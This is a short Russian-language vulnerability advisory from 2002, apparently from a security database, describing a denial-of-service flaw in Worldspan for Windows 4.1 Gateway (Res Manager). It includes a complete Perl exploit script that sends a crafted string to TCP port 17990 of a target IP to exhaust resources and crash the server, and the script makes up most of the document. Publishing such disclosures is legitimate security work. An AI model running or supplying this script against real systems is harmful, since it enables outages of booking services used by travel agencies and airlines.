DoS против Worldspan
| Дата публикации: | 05.07.2002 |
| Всего просмотров: | 1559 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Worldspan - одна из ведущих компаний, который создает программное обеспечение для использования туристическими агентствами. Программы Worldspan используется многими транспортными агентствами, авиалиниями и т.п. Уязвимость обнаружена в программе Res Manager (Worldspan for Windows), которая используется для подключения к Worldspan через частные линии или интернет. Программа не в состоянии обработать специально сконструированный запрос к 17990 порту (который использует Res Manager для связи с агентами). При попытке обработать такой запрос система начнет использовать все доступные системные ресурсы, что, в конечном счете, приведет к краху сервера. Уязвимость обнаружена в Worldspan for Windows 4.1 Gateway Пример:
#!/usr/bin/perl
#altomo@digitalgangsters.net
#Worldspan Gateway DoS
$sabre = "worldspanshouldgoboom";
use IO::Socket;
$ip = "$ARGV[0]";
$port = "17990";
if ($#ARGV<0) {
print " useage: $0 <ip>\n";
exit();
}
$socket = IO::Socket::INET->new(
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>$port,);
print "Worldspan Gateway DoS\n";
print "altomo\@digitalgangsters.net\n";
print "Wait about a minute, and it should crash.\n";
print $socket "$sabre\r";
close $socket;
#nudehackers
|
| Ссылки: | Worldspan for Windows 4.1 Gateway |